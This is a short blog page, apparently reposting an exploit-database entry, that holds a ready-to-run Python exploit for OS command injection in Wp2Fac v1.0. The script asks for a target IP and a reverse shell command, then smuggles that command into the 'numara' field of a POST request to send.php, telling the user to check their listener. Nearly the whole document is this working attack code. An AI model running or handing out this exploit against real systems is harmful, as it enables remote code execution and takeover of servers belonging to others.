Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86399008

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Wp2Fac v1.0 - OS Command Injection
# Date: 2023-08-27
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://github.com/metinyesil/wp2fac
# Tested on: Kali Linux & Windows 11
# CVE: N/A

import requests

def send_post_request(host, revshell):
    url = f'http://{host}/send.php'
    headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0)
Gecko/20100101 Firefox/102.0',
        'Accept': '*/*',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'Origin': f'http://{host}',
        'Connection': 'close',
        'Referer': f'http://{host}/',
    }

    data = {
        'numara': f'1234567890 & {revshell} &;'
    }

    response = requests.post(url, headers=headers, data=data)
    return response.text

host = input("Target IP: ")

revshell = input("Reverse Shell Command: ")

print("Check your listener!")

send_post_request(host, revshell)